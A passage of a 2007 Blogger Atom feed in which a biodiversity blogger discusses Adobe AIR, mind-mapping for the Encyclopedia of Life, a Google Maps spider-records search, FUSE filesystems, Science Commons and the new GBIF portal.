href='http://ispiders.blogspot.com/feeds/6425471825609363392/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=6425471825609363392' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6425471825609363392'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6425471825609363392'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/08/gimme-that-scientific-paper-part-iii.html' title='Gimme That Scientific Paper Part III'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_VYUFlXOCOxE/Rskntg5KjvI/AAAAAAAAADM/541IbU1x47E/s72-c/magnifier.png' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-5073047403936789293</id><published>2007-08-15T22:14:00.000-06:00</published><updated>2007-08-15T22:45:11.369-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EoL'/><category scheme='http://www.blogger.com/atom/ns#' term='mindmap'/><category scheme='http://www.blogger.com/atom/ns#' term='trees'/><title type='text'>Mind Dumps...er...Maps/Graphs/Trees</title><content type='html'>&lt;a href="http://1.bp.blogspot.com/_VYUFlXOCOxE/RsPV3Q5KjuI/AAAAAAAAADE/w61bkLzY1h0/s1600-h/mindomo_logo.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5099154348517789410" style="FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="" src="http://1.bp.blogspot.com/_VYUFlXOCOxE/RsPV3Q5KjuI/AAAAAAAAADE/w61bkLzY1h0/s320/mindomo_logo.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div&gt;Since Adobe has been &lt;a href="http://onair.adobe.com/"&gt;driving across the US&lt;/a&gt;, selling some &lt;a href="http://labs.adobe.com/technologies/air/"&gt;AIR&lt;/a&gt;, I thought I'd take a closer look at Flex/Flash applications that might fit the bill for some &lt;a href="http://ispiders.blogspot.com/2007/05/living-encyclopedia-myeol.html"&gt;tough ideas&lt;/a&gt; I have been wrestling with. In a somewhat similar GUI struggle, Rod Page has been &lt;a href="http://iphylo.blogspot.com/2007/08/viewing-very-large-trees.html"&gt;fevershly&lt;/a&gt; &lt;a href="http://iphylo.blogspot.com/2007/08/visualising-very-big-trees-part-ii.html"&gt;playing&lt;/a&gt; &lt;a href="http://iphylo.blogspot.com/2007/08/visualising-very-big-trees-part-iii.html"&gt;with&lt;/a&gt; &lt;a href="http://iphylo.blogspot.com/2007/08/visualising-very-big-trees-part-iv.html"&gt;Supertrees&lt;/a&gt;, trying to find a web-based, non-Java solution. So, I did a bit of digging into some &lt;a href="http://offlinetech.blogspot.com/search/label/AIR"&gt;showcased Adobe AIR applications&lt;/a&gt; - &lt;a href="http://www.adobeairtutorials.com/"&gt;tutorial&lt;/a&gt; and &lt;a href="http://airchive.codeapollo.com/browse.php"&gt;demo&lt;/a&gt; &lt;a href="http://www.scalenine.com/showcase.php"&gt;sites&lt;/a&gt; are cropping up all over the place - and a Flex application that will soon be transformed into AIR caught my eye: &lt;a href="http://www.mindomo.com/"&gt;Mindomo&lt;/a&gt;. Now, if this mindmapping application had RDF tying the bits together, which came via distributed web services from GBIF, GenBank, CrossRef, etc., we'd have a real winner here. Mindomo is exactly the application I have been dreaming about for The &lt;a href="http://www.eol.org/"&gt;Encyclopedia of Life&lt;/a&gt; (EOL)'s WorkBench; it just has to be pinned down into the biological, semantic web world. Since an AIR application can wrap all this up in a web/desktop hybrid application, I am convinced this is what EOL absolutely must produce.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-5073047403936789293?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/5073047403936789293/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=5073047403936789293' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5073047403936789293'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5073047403936789293'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/08/mind-dumpsermapsgraphstrees.html' title='Mind Dumps...er...Maps/Graphs/Trees'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_VYUFlXOCOxE/RsPV3Q5KjuI/AAAAAAAAADE/w61bkLzY1h0/s72-c/mindomo_logo.png' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-382152069469080354</id><published>2007-08-13T23:20:00.000-06:00</published><updated>2007-10-25T13:37:31.706-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='spiders'/><title type='text'>Google Finds Spiders in Your Backyard</title><content type='html'>The Google API team have added a new &lt;a href="http://googlemapsapi.blogspot.com/2007/08/you-can-always-go-back-to-where-you.html"&gt;DragZoomControl&lt;/a&gt; to the list of available functions. This feature has been bandied about for quite some time and various people have hacked together approximations for this using &lt;a href="http://groups.google.com/group/Google-Maps-API/browse_thread/thread/b8444af7755749cb/d9e179567fa7a901?lnk=gst&amp;q=dps1&amp;amp;rnum=10#d9e179567fa7a901"&gt;other JavaScript functions&lt;/a&gt;. My interest in this isn't so much the zoom function as cool as that is, but the ability to query resources bound by the drawn box.&lt;br /&gt;&lt;br /&gt;Kludging DragZoomControl to perform a spatial query isn't particularly practical or useful so I used a Yahoo YUI "&lt;a href="http://developer.yahoo.com/yui/examples/dragdrop/dd-resize.html"&gt;Drag &amp; Drop - Resizable Panel&lt;/a&gt;" to fix-up what I once using. What I used in the past that didn't perform well for Safari users was some scripting from Cross-Browser.com called the &lt;a href="http://www.cross-browser.com/"&gt;X Library&lt;/a&gt;. Now, with Yahoo's improvement on this, the function works as expected. Because it's very easy to add things that stay positioned within such a draggable box, the Yahoo YUI component is a much better solution. So, just like you can zoom in / zoom out with the Google DragZoomControl, so too can you put these functions within a draggable, resizable box. I'll also add that the resizing function in Yahoo's component is much smoother than Google's own DragZoomControl. Now the fun part...&lt;br /&gt;&lt;br /&gt;&lt;div align="center"&gt;&lt;a href="http://1.bp.blogspot.com/_VYUFlXOCOxE/RsFIP7cmtCI/AAAAAAAAACk/QSlFekkvdT8/s1600-h/box.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5098435691653018658" style="CURSOR: hand" alt="" src="http://1.bp.blogspot.com/_VYUFlXOCOxE/RsFIP7cmtCI/AAAAAAAAACk/QSlFekkvdT8/s320/box.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_VYUFlXOCOxE/RsE74LcmtAI/AAAAAAAAACU/zMbJYD06Wlk/s1600-h/map.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5098422089491592194" style="CURSOR: hand" alt="" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/RsE74LcmtAI/AAAAAAAAACU/zMbJYD06Wlk/s320/map.png" border="0" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Two little icons within the draggable, resizable box allow you to search for spider images or produce a spider species list, which are based on collections records submitted to &lt;a href="http://www.canadianarachnology.org/data/canada_spiders/"&gt;The Nearctic Spider Database&lt;/a&gt;. Click &lt;a href="http://www.canadianarachnology.org/data/canada_spiders/gmapbounds.asp"&gt;HERE&lt;/a&gt; to try your hand at it and search for spiders in your back yard.&lt;br /&gt;&lt;br /&gt;The advantage of such a simple function is that one need not have a spatial database like PostgreSQL, but can make use of any enterprise back-end. The query run is the typical minX, maxX, minY, maxY to define the four corner coordinates. With a ton of records in the backend however, the query can take a long time to complete so an index on the latitude and longitude columns may be required as explained in the &lt;a href="http://groups.google.com/group/Google-Maps-API/browse_thread/thread/b298b1aa0bd148c6/56f827709af53a70?lnk=gst&amp;amp;q=bounding+box&amp;amp;rnum=1#56f827709af53a70"&gt;Google API Group&lt;/a&gt;. If you want to see what you &lt;em&gt;can&lt;/em&gt; do with a spatial database however, have a look at what programmers for the &lt;a href="http://www.nlbif.nl/"&gt;Netherlands Biodiversity Information Facility&lt;/a&gt; have put together.&lt;br /&gt;&lt;br /&gt;Happy spider hunting... &lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-382152069469080354?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/382152069469080354/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=382152069469080354' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/382152069469080354'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/382152069469080354'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/08/google-finds-spiders-in-your-backyard.html' title='Google Finds Spiders in Your Backyard'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_VYUFlXOCOxE/RsFIP7cmtCI/AAAAAAAAACk/QSlFekkvdT8/s72-c/box.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-1758099376270608612</id><published>2007-08-07T11:59:00.000-06:00</published><updated>2007-08-07T13:07:43.012-06:00</updated><title type='text'>Dare to Dream Big</title><content type='html'>This post will be quite off-topic, but I just had to share some recent stuff in the works that caught my eye.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_VYUFlXOCOxE/Rri--Lcms_I/AAAAAAAAACM/LVoKCgv-7lE/s1600-h/tour1-1.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/_VYUFlXOCOxE/Rri--Lcms_I/AAAAAAAAACM/LVoKCgv-7lE/s320/tour1-1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5096032953803650034" /&gt;&lt;/a&gt;First up is a spin-off from research at MIT, led by Sanjit Biswas who temporarily left his Ph.D. program (are you sure, Sanjit?) to lead a company called &lt;a href="http://meraki.com"&gt;Meraki&lt;/a&gt;. The cheap, little router/repeaters permit the creation of "smart", distributed networks such that a single DSL connection can feed dozens of end-points. The firmware in each little gizmo permits a network admin to monetize these ad-hoc connections. Consequently, getting connected to the 'net could be as cheap as a $1 a month once a user buys the attractive Meraki mini. The company also recently announced a Meraki Solar kit. Now that's forward thinking. There are dozens of testaments on the Meraki web site including one from the town Salinas, Ecuador where a network of schools are now connected even though there are no phonelines!&lt;br /&gt;&lt;br /&gt;Distributed, ad hoc connections like this reminded me of an email I recently received from Rod Page who alerted me to &lt;a href="http://fuse.sourceforge.net/"&gt;FUSE&lt;/a&gt;, which stands for "File System in Userspace". This is a Linux-based, Sourceforge project that allows a user to create &amp; mount virtual drives that contain or represent a vast array of file types. For example: 1) Fuse::DBI file system mounts some data from relational databases as files, 2) BloggerFS "is a filesystem that allow Blogger users to manipulate posts on their blogs via a file interface.", and 3) Yacufs "is a virtual file system that is able to convert your files on-the-fly. It allows you to access various file types as a single file type. For instance you can access your music library containing .ogg, .flac and .mp3 files, but see them all as if being .mp3 files." This all sounds very geeky, but I draw your attention to MacFUSE (sadly, there is not yet a WindowsFUSE, though it appears this functionality has &lt;a href="http://www.rentacoder.com/RentACoder/misc/BidRequests/ShowBidRequest.asp?lngBidRequestId=586300"&gt;not gone unnoticed&lt;/a&gt;):&lt;br /&gt;&lt;br /&gt;&lt;embed style="width:400px; height:326px;" id="VideoPlayback" type="application/x-shockwave-flash" src="http://video.google.com/googleplayer.swf?docId=3138515991250095768&amp;hl=en-CA" flashvars=""&gt; &lt;/embed&gt;&lt;br /&gt;&lt;br /&gt;So what? Isn't this just like some sort of peer-2-peer system? Absolutely not. This is more like a distributed content management system and, coupled with a highly intelligent Yacufs-like extension, it means that file types (e.g. MS Word, OpenOffice, etc.) can be converted on-the-fly to whatever file format you want or need. To step this thinking up a bit in case you have no idea why this is relevant to ecology or systematics, have a look at the cool things Cynthia Parr and her colleagues are doing to visualize distributed data sets: doi:&lt;a href="http://dx.doi.org/10.1016/j.ecoinf.2007.03.005"&gt;10.1016/j.ecoinf.2007.03.005&lt;/a&gt;. FUSE means the work Cynthia &amp; others are doing (e.g. &lt;a href="http://seek.ecoinformatics.org/"&gt;SEEK&lt;/a&gt;) don't need a GUI. Rather, we just need a way to organize the gazoodles of files that would/could be present in an ecologically- or taxonomically-relevant filesystem. Maybe I should coin these EcoFS and TaxonFS :)~&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-1758099376270608612?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/1758099376270608612/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=1758099376270608612' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1758099376270608612'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1758099376270608612'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/08/dare-to-dream-big.html' title='Dare to Dream Big'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_VYUFlXOCOxE/Rri--Lcms_I/AAAAAAAAACM/LVoKCgv-7lE/s72-c/tour1-1.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-222144332799719986</id><published>2007-07-24T13:30:00.000-06:00</published><updated>2007-07-24T14:06:15.578-06:00</updated><title type='text'>The Next Scientific Revolution?</title><content type='html'>&lt;a href="http://2.bp.blogspot.com/_VYUFlXOCOxE/RqZXW7cms-I/AAAAAAAAACE/RlNqol31gB0/s1600-h/scicomlogo.gif"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/RqZXW7cms-I/AAAAAAAAACE/RlNqol31gB0/s320/scicomlogo.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5090852480215331810" /&gt;&lt;/a&gt;&lt;br /&gt;With the advent of Science Commons (see the &lt;a href="http://www.popsci.com/popsci/technology/f8a1780809ed3110vgnvcm1000004eecbccdrcrd.html"&gt;popsci.com article&lt;/a&gt;) and cool new tools available at &lt;em&gt;Nature&lt;/em&gt; like its &lt;a href="http://precedings.nature.com/"&gt;Precedings&lt;/a&gt;, opportunities to share research outside for-profit business models (&lt;em&gt;i.e.&lt;/em&gt; journals) are starting to gain momentum. Systems like &lt;a href="http://sciencecommons.org/projects/data/"&gt;Neurocommons&lt;/a&gt; allow for a redrawing of money tranfer trajectories around and within publishing firms such that everyone can play nice in the sandbox. Medical research sells no matter how you redraw the lines or rebuild the castle. But, I wonder if the discussions around these "revolutions" have attempted to include pure research whose business model is based entirely on public funds and funding institutions that receive their monies from government pots? How do you sell Science Commons to mathematicians, theoretical physicists, systematists, ecologists, among other scientists whose research is not closely tied to big bucks pharmaceutical companies and a Gates Foundation? Repositories like &lt;a href="http://www.ibridgenetwork.org/"&gt;iBridge&lt;/a&gt; are useful for niche markets and interests, but I'd hardly call them revolutionary for all of &lt;em&gt;science&lt;/em&gt;. If proponents of the Semantic Web want to sell their ideas, I'd like to see buy-in by one tenured ecologist &amp; then some demonstrable evidence for how this will accelerate his/her research.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-222144332799719986?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/222144332799719986/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=222144332799719986' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/222144332799719986'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/222144332799719986'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/07/next-scientific-revolution.html' title='The Next Scientific Revolution?'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_VYUFlXOCOxE/RqZXW7cms-I/AAAAAAAAACE/RlNqol31gB0/s72-c/scicomlogo.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-5673283253336777174</id><published>2007-07-19T14:18:00.000-06:00</published><updated>2007-07-20T10:19:07.378-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EoL'/><title type='text'>Biodiversity on the Desktop</title><content type='html'>&lt;a href="http://4.bp.blogspot.com/_VYUFlXOCOxE/Rp_PZ1qLSkI/AAAAAAAAAB8/WD2YqBHyc8o/s1600-h/adobe_air.gif"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/Rp_PZ1qLSkI/AAAAAAAAAB8/WD2YqBHyc8o/s320/adobe_air.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5089014146759608898" /&gt;&lt;/a&gt;&lt;br /&gt;In earlier &lt;a href="http://ispiders.blogspot.com/2007/05/living-encyclopedia-myeol.html"&gt;posts&lt;/a&gt;, I described my vision of an &lt;a href="http://www.eol.org"&gt;Encyclopedia of Life&lt;/a&gt; (EoL) where the web and your desktop environment are blurred or mashed together. In such a manner, I envisioned a tool where users and contributors to EoL could maintain either a public or private working space to mix and mash data from multiple sources with those in their own hard drives.&lt;br /&gt;&lt;br /&gt;One of the grandiose dreams I had was the ability to create a private, content management-like community within EoL in which co-authors of a proposed manuscript like a taxonomic revision could merge their datasets, grab data from third party sources if useful (&lt;em&gt;e.g.&lt;/em&gt; GenBank, GBIF, &lt;em&gt;etc.&lt;/em&gt;), and collectively work on the manuscript. Upon completion of the manuscript, there may be some elements of use to EoL that the authors could later push out, which in no way diminishes the value of their publication or would cause editors to frown and reject the paper, but offers immediate value to the public at large. Granted I'm not totally clear on how this will work, but I really don't think it would be completely unrealistic. But, what I can't stress enough, is that EoL cannot be like WikiSpecies where contributors have to sit and author content solely for use in WikiSpecies. Rather, it absolutely must have a system that can somehow slip into the workflow of biologists. I'm now convinced that such a vision is not science fiction.&lt;br /&gt;&lt;br /&gt;I watched a few Adobe AIR (Adobe Integrated Runtime - code named Apollo) videos this morning and got thoroughly fired-up about the possibilities. Google has been working on an offline API, which looks pretty good, but AIR blows all this out of the water because it allows a developer to maintain an application's presence on the desktop. Further, it can be integrated into the operating system. So, imagine working on a manuscript with a handful of colleagues and be notified with a desktop toast pop-up when he/she has completed his/her revisions or sections of the manuscript, or if a dataset in EoL suddenly became available while the manuscript was being prepared.&lt;br /&gt;&lt;br /&gt;The really cool thing from a web developer's perspective is that AIR uses existing web programming tools, &lt;em&gt;i.e.&lt;/em&gt; the learning curve to create these cross-platform applications is quite shallow because code can be repurposed for either the web or the desktop...at least that's the impression I get from watching a few of these videos. Here's &lt;a href="http://onair.adobe.com/blogs/videos/2007/03/11/christian-cantrell-demos-apollo/"&gt;one such video&lt;/a&gt; where Christian Cantrell demonstrates a few simple applications built on AIR...just mentally substitute Amazon for EoL and you get my drift.&lt;br /&gt;&lt;br /&gt;Now, all this stuff is really cool and there is indeed the potential for EoL or the totally unknown "MyEoL" to truly transform the science of biology because it can &amp; should slip into biologists' workflows. Of course, there's no reason why multiple flavours of these AIR desktop applications couldn't be built for children, amateur naturalists, scientists, or however EoL sees its user base. In fact, what I'd really like to see is a BioBlitz class of user where observational data can be merged across interest groups at any geographic scale in their respective desktop applications. An Encyclopedia is great, but we ultimately want people to use the encyclopedia and go outside with fellow human beings to look at, count, touch, or otherwise experience life on our planet. Each flavour of the desktop application can be customized to do different chores or expose different aspects of the EoL system to various classes of end users. The first step then is to nail the needs and design these applications around them. So, here are a few questions to kick-start this process, at least for biologists/systematists who are excited about EoL but just don't believe there will ever be time for them to contribute content:&lt;br /&gt;&lt;br /&gt;1. When conducting a taxonomic revision, what are the significant organizational and communications impediments that have slowed down the process?&lt;br /&gt;2. What data sets are vital to conducting an effective revision?&lt;br /&gt;3. What desktop software applications are critical when conducting a revision? [remember, because AIR is on the desktop, there may be an opportunity here to automate file type transformations produced by one provider/database/spreadsheet to the applications required to actually analyze the data]&lt;br /&gt;&lt;br /&gt;#2 above will be a challenge and will require that data providers produce similarly structured APIs (&lt;em&gt;e.g.&lt;/em&gt; DiGIR, TAPIR, OpenSearch, and the like). This I believe, is where EoL has to take firm leadership. What it needs now is a demo application like that produced by Adobe and Christian Cantrell so we can all visualize this dream. Currently, the EoL dream is very fuzzy and has lead to a lot of miscommunication and confusion. &lt;em&gt;e.g.&lt;/em&gt; isn't this just WikiSpecies? THEN, EoL absolutely must write some recipes for content providers to start sharing their data in a manner like what Google does with their Google Maps API. The selling point will be iconographic and link-back attribution for content providers, which can be constructed already if all content providers used a system like OpenSearch, MediaRSS, GeoRSS, and various other RSS flavours to open their doors.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-5673283253336777174?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/5673283253336777174/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=5673283253336777174' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5673283253336777174'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5673283253336777174'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/07/biodiversity-on-desktop.html' title='Biodiversity on the Desktop'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_VYUFlXOCOxE/Rp_PZ1qLSkI/AAAAAAAAAB8/WD2YqBHyc8o/s72-c/adobe_air.gif' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-4037349608760680022</id><published>2007-07-04T13:30:00.000-06:00</published><updated>2007-07-04T14:34:01.944-06:00</updated><title type='text'>Digital Species Descriptions &amp; the new GBIF portal</title><content type='html'>The Biodiversity Information Standards (previously known as TDWG, the Taxonomic Database Working Group) has recently rolled out a new subsgroup called "&lt;a href="http://wiki.tdwg.org/twiki/bin/view/SPM/WebHome"&gt;Species Profile Model&lt;/a&gt;" led by Éamonn Ó Tuama (GBIF). Thirteen people attended a workshop April 16-18, 2007 in Copenhagen, DK shortly after the Encyclopedia of Life &lt;a href="http://eolinformatics.mbl.edu/index.html"&gt;informatics workshop&lt;/a&gt; in Woods Hole, MA. The point of this Copenhagen workshop was to hash out a specification to support the retrieval and integration of data with the lofty goal of "reaching consensus and avoiding fragmentation" of existing species-level initiatives. I'm all for this, but I wonder if it will work? I believe "consensus" as it's described here is meant to be a common way of presenting the data rather than a true taxonomic, ecological, or political consensus. A specification does not preclude the possibility for several variants of a species profile served from multiple (or even the same) provider. These could of course have conflicting or dated information and ultimately result in misleading COSEWIC-type recommendations. So, what about consensus as we usually define it? Or, is that beyond the responsibility of this subgroup?&lt;br /&gt;&lt;br /&gt;A standard for specimen data (Darwin Core, ABCD, etc.) is obvious, but I'm not convinced that a standard for species descriptions is wise unless such a standard were developed and solely hosted by the nomenclators and sanctioned by the various Codes. A standard for species descriptions without ties to the nomenclators and the authors who conducted the original species description or revision merely democratizes fluff. Before a standard Species Profile Model is put into practise, such RDF representations have to at least explicitly incorporate peer review, authorship, and a date stamp.&lt;br /&gt;&lt;br /&gt;I also noticed that the Species Profile Model is attempting to integrare citations to scientific literature. I suggest the team take a good close look at &lt;a href="http://www.exlibrisgroup.com/sfx_openurl_syntax.htm"&gt;OpenURL&lt;/a&gt;, which lends itself to useful functionality when building lists of references in front-end applications (see Rod Page's &lt;a href="http://iphylo.blogspot.com/2007/06/making-taxonomic-literature-online.html"&gt;post in iPhylo&lt;/a&gt; on this very subject and several posts in this blog). The OpenURL format will influence how the elements in the proposed Species Profile Model ought to be constructed.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_VYUFlXOCOxE/RowAJ9k0stI/AAAAAAAAAB0/avJyyz-qBAM/s1600-h/gbif_05.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/RowAJ9k0stI/AAAAAAAAAB0/avJyyz-qBAM/s320/gbif_05.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5083438250542281426" /&gt;&lt;/a&gt; On other fronts, GBIF just rolled out their new portal: &lt;a href="http://data.gbif.org"&gt;http://data.gbif.org&lt;/a&gt;. It looks as if the whole index and back-end was reconstructed and there remain some missing provider data tables. In time, these will probably blink on as they were presented via the old portal. What I appreciate seeing for the first time is a concerted effort to give providers some auto-magic feedback about what is being served from their boxes. Vetting data is a very important part of federation and I hope &lt;a href="http://data.gbif.org/datasets/"&gt;providers&lt;/a&gt; sit up and take notice. GBIF calls these "event logs", which is too obtuse. I'd like to see this called "Questionable Data Served from this Provider", "Problem Records", or "The Crap You're Serving the Scientific Community", or something similar. "Event logs" is easily dismissed and overlooked. For example, here are the event logs for the University of Alaska Museum of the North Mollusc Collection: &lt;a href="http://data.gbif.org/datasets/resource/967/logs/"&gt;http://data.gbif.org/datasets/resource/967/logs/&lt;/a&gt;. GBIF also has a flashy new logo &amp; plenty of easy to use web services.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-4037349608760680022?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/4037349608760680022/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=4037349608760680022' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/4037349608760680022'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/4037349608760680022'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/07/digital-species-descriptions-new-gbif.html' title='Digital Species Descriptions &amp; the new GBIF portal'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_VYUFlXOCOxE/RowAJ9k0stI/AAAAAAAAAB0/avJyyz-qBAM/s72-c/gbif_05.jpg' height='72' width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-6501083395114513570</id><published>2007-06-19T19:58:00.000-06:00</published><updated>2007-10-06T14:15:36.071-06:00</updated><title type='text'>DiGIR for Collectors</title><content type='html'>&lt;a 